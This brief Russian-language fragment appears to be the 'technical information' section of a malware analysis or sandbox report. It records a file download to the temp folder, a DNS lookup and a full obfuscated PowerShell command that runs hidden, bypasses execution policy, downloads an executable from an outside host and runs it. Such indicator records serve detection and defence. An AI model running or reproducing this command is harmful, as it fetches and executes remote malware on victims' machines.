Техническая информация
- https://a.safe.moe/enubb.exe как %temp%\\andghe.exe
- '<SYSTEM32>\cmd.exe' /c POwErSHELl.ExE -WindoWSTYLe hiDdEN -NoPrOFile -eXECUtIonPOLicy byPASs (NeW-ObjECt SyStEm.NeT.WebCLiEnT).DOWnLOAdFiLE('https://a.safe.moe/EnuBB.exe','%TEMP%\\andghe.exe') & %TEMP%\\andghe.exe
- DNS ASK a.##fe.moe